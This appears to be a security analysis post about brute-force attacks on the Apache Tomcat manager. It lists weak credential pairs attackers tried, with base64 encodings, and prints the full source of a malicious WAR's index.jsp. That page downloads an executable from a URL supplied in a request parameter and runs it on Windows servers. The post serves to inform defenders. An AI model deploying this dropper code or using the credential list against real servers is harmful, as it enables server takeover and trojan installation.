HTTP Header
 
Decoded valu
 
bWFuYWdlcjpUZXN0
bWFuYWdlcjphZG1pbnNlcnZlcg==bWFuYWdlcjpzcWxzZXJ2ZXI=
bWFuYWdlcjoyMDA5
bWFuYWdlcjoxNTk3NTM=
bWFuYWdlcjoxMjM0cXdlcmFzZGZ6eGN2
bWFuYWdlcjoxMjM0cXdlcmFzZGY=
bWFuYWdlcjoxMjM0cXdlcg==
bWFuYWdlcjoxMjNxd2U=
bWFuYWdlcjoxMjNxd2Vhc2Q=

 

 
manager:Test
manager:adminservermanager:sqlserver
manager:2009
manager:159753
manager:1234qwerasdfzxcv
manager:1234qwerasdf
manager:1234qwer
manager:123qwe
manager:123qweasd

 

The main reason that hackers want to brute-force the Tomcat manager password is to install a WAR (web archive) like fexcep.war.

We were able to download this WAR from a hacked server.

This WAR will deploy 2 JSP files on the server: index.jsp and ok.jsp. The most important parts are indicated in RED.

The index.jsp has the following source code:

<%@ page language="java" pageEncoding="utf-8" import="java.io.*,java.net.*,java.security.*,javax.crypto.*"%>

<%!
String sys=null;
public class AutoKill {   
private boolean downFile(String url,String filesrc)    {
        try
        {
        URL urlc = new URL(url);
        HttpURLConnection con = (HttpURLConnection)urlc.openConnection();
        con.connect();
        byte[] b=new byte[1024];
        BufferedInputStream bis=new BufferedInputStream(con.getInputStream());
        FileOutputStream fos=new FileOutputStream(filesrc);
        int length=-1;
        while((length=bis.read(b,0,b.length))!=-1)
        {
            fos.write(b,0,length);
        }
        fos.close();
        bis.close();
        return true;
        }catch(Exception e)
        {
        e.printStackTrace();
        }
        return false;
    }
}
%>

<%
        sys=System.getProperty("os.name");
        int i=sys.indexOf("Windows");
        AutoKill ak=new AutoKill();

        if(i>-1)
        {
            String result;
            try
            {
                String url=request.getParameter("userurl");
                System.out.println(url);
                String filesrc=request.getSession().getServletContext().getRealPath("")+"/init.exe";
                if (ak.downFile(url,filesrc) )
                {
                    Process run_proc=Runtime.getRuntime().exec(filesrc);
                    result="Success! ";
                }
                else
                {
                    result="Failure! Down File Failure!";
                }
            }catch(Exception e)
            {
                result="Failure!throws Exception - "+e.getMessage()+"! ";
            }
            request.setAttribute("result",result);
        }
        else
        {
            request.setAttribute("result","Failure!Because Remote computer system is "+sys+"!");
        }
               
        request.getRequestDispatcher("/ok.jsp").forward(request, response);

%>

When an attacker is able to deploy the WAR, the hacker can access the index.jsp using a browser and instruct it to download and execute a Trojan backdoor on the compromised system.